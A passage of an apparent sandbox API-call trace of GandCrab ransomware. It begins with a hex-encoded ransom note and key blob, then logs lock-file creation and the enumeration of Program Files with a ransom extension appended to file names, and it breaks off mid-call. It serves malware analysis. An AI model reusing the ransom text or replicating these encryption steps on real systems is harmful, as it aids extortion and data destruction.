x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.591] WriteFile (in: hFile=0x218, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259fa30, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259fa30*=0x2162, lpOverlapped=0x0) returned 1 [0067.592] CloseHandle (hObject=0x218) returned 1 [0067.593] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.593] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.593] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xc, wMilliseconds=0x392)) [0067.593] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.593] GetWindowsDirectoryW (in: lpBuffer=0x2610000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.593] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2610200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2610600, lpMaximumComponentLength=0x2610608, lpFileSystemFlags=0x2610604, lpFileSystemNameBuffer=0x2610400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2610600*=0xd2ca4def, lpMaximumComponentLength=0x2610608*=0xff, lpFileSystemFlags=0x2610604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.594] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Program Files (x86)\\d2ca4a09d2ca4deb61a.lock") returned 47 [0067.594] CreateFileW (lpFileName="C:\\Program Files (x86)\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\program files (x86)\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x218 [0067.595] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.595] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.595] lstrlenW (lpString="C:\\Program Files (x86)\\") returned 23 [0067.595] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="*" | out: lpString1="C:\\Program Files (x86)\\*") returned="C:\\Program Files (x86)\\*" [0067.596] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\*", fInfoLevelId=0x1, lpFindFileData=0x259fa4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259fa4c) returned 0x4c9d38 [0067.596] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.596] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.596] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.596] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.596] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.596] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0067.596] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0067.596] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Adobe" | out: lpString1="C:\\Program Files (x86)\\Adobe") returned="C:\\Program Files (x86)\\Adobe" [0067.596] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.596] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0067.596] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0067.596] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Common Files" | out: lpString1="C:\\Program Files (x86)\\Common Files") returned="C:\\Program Files (x86)\\Common Files" [0067.596] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.596] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0067.596] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0067.596] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Program Files (x86)\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Program Files (x86)\\d2ca4a09d2ca4deb61a.lock" [0067.596] lstrlenW (lpString=".titwmvjl") returned 9 [0067.596] lstrlenW (lpString="C:\\Program Files (x86)\\d2ca4a09d2ca4deb61a.lock") returned 47 [0067.596] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.597] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Program Files (x86)\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 56 [0067.597] lstrlenW (lpString="C:\\Program Files (x86)\\d2ca4a09d2ca4deb61a.lock") returned 47 [0067.597] lstrlenW (lpString=".lock") returned 5 [0067.597] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.597] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".lock ") returned 6 [0067.597] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.597] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.597] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.597] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0067.597] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0067.598] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="desktop.ini" | out: lpString1="C:\\Program Files (x86)\\desktop.ini") returned="C:\\Program Files (x86)\\desktop.ini" [0067.598] lstrlenW (lpString=".titwmvjl") returned 9 [0067.598] lstrlenW (lpString="C:\\Program Files (x86)\\desktop.ini") returned 34 [0067.598] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.598] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Program Files (x86)\\desktop.ini.titwmvjl") returned 43 [0067.598] lstrlenW (lpString="C:\\Program Files (x86)\\desktop.ini") returned 34 [0067.598] lstrlenW (lpString=".ini") returned 4 [0067.598] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.598] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".ini ") returned 5 [0067.598] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0067.598] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.598] lstrlenW (lpString="C:\\Program Files (x86)\\desktop.ini") returned 34 [0067.598] lstrlenW (lpString="C:\\Program Files (x86)\\desktop.ini") returned 34 [0067.598] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0067.598] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.599] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.599] lstrcmpW (lpString1="Google", lpString2=".") returned 1 [0067.599] lstrcmpW (lpString1="Google", lpString2="..") returned 1 [0067.599] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Google" | out: lpString1="C:\\Program Files (x86)\\Google") returned="C:\\Program Files (x86)\\Google" [0067.599] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.599] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0067.599] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0067.599] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Internet Explorer" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer") returned="C:\\Program Files (x86)\\Internet Explorer" [0067.599] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.599] lstrcmpW (lpString1="Microsoft.NET", lpString2=".") returned 1 [0067.599] lstrcmpW (lpString1="Microsoft.NET", lpString2="..") returned 1 [0067.599] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Microsoft.NET" | out: lpString1="C:\\Program Files (x86)\\Microsoft.NET") returned="C:\\Program Files (x86)\\Microsoft.NET" [0067.599] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.599] lstrcmpW (lpString1="Mozilla Firefox", lpString2=".") returned 1 [0067.599] lstrcmpW (lpString1="Mozilla Firefox", lpString2="..") returned 1 [0067.599] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Mozilla Firefox" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Program Files (x86)\\Mozilla Firefox" [0067.599] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.599] lstrcmpW (lpString1="Mozilla Maintenance Service", lpString2=".") returned 1 [0067.599] lstrcmpW (lpString1="Mozilla Maintenance Service", lpString2="..") returned 1 [0067.599] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Mozilla Maintenance Service" | out: lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service") returned="C:\\Program Files (x86)\\Mozilla Maintenance Service" [0067.600] FindNextFileW (in: 